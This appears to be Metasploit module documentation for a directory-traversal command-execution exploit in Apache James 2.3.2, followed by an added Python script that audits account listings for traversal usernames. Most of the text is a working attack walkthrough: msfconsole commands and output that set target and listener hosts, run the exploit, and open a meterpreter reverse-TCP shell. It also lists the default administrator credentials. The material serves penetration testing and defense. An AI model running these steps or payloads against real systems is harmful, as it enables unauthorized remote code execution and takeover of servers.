## Vulnerable Application

This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file.

Instructions for installing the vulnerable application for testing can be found here: https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf

## Verification Steps

1. Load the module:

```
msf5 > use exploit/linux/smtp/apache_james_exec
```

2. Set remote and local options:

```
msf5 exploit(linux/smtp/apache_james_exec) > set target 1
target => 1
msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
rhosts => 192.168.224.164
msf5 exploit(linux/smtp/apache_james_exec) > set rport 25
rport => 25
msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
lhost => 192.168.224.167
msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
lport => 4444
```

3. Set payload:

```
msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
```

4. Check version and run exploit:

```
msf5 exploit(linux/smtp/apache_james_exec) > check
[*] 192.168.224.164:25 - The target appears to be vulnerable.
msf5 exploit(linux/smtp/apache_james_exec) > exploit
[*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
```

5. Set up and run listener (can be done before running the exploit):

```
msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > set lhost 192.168.224.167
lhost => 192.168.224.167
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.224.167:4444
[*] Sending stage (3021284 bytes) to 192.168.224.164
[*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800

meterpreter >
```

## Options

**USERNAME:** The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.

**PASSWORD:** The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.

**ADMINPORT:** The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.

**RHOSTS:** The IP address of the vulnerable server.

**RPORT:** The port number of the SMTP service.

## Targets

```
Id  Name
--  ----
0   Linux x86
1   Linux x64
```
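
## Auditing for traversal usernames (added example)

The missing username validation described under Vulnerable Application can be checked for from the defender's side. The following Python sketch is an added example, not code from the module or from Apache James: it audits an account listing for usernames that would resolve outside a per-user mail directory. The `MAIL_ROOT` path, the `user: <name>` listing format and the sample listing are assumptions constructed for illustration.

```python
import posixpath
import re

# Hypothetical location; assumes the mail store derives a per-user
# directory by joining this root with the username.
MAIL_ROOT = "/srv/mailstore/inboxes"

# Allowlist: starts with an alphanumeric, no path separators, bounded length.
ALLOWED = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

def escapes_root(username, root=MAIL_ROOT):
    """True if root/username resolves to root itself or anywhere outside it."""
    resolved = posixpath.normpath(posixpath.join(root, username))
    return not resolved.startswith(root.rstrip("/") + "/")

def is_safe_username(username):
    """Validation the account-creation path lacks: allowlist plus path check."""
    return bool(ALLOWED.fullmatch(username)) and not escapes_root(username)

def audit_accounts(listing):
    """Return usernames from a 'user: <name>' listing that fail validation."""
    flagged = []
    for line in listing.splitlines():
        if line.startswith("user: "):
            name = line[len("user: "):]
            if not is_safe_username(name):
                flagged.append(name)
    return flagged

# Constructed sample listing (not captured from a real server).
SAMPLE_LISTING = """Existing accounts 5
user: alice
user: bob.smith
user: ../../outside
user: /srv/other
user: ..
"""

if __name__ == "__main__":
    for name in audit_accounts(SAMPLE_LISTING):
        print("suspicious account name:", repr(name))
```

Any flagged account on a James 2.3.2 host is worth treating as an indicator of attempted exploitation, alongside changing the default remote administration credentials listed under Options.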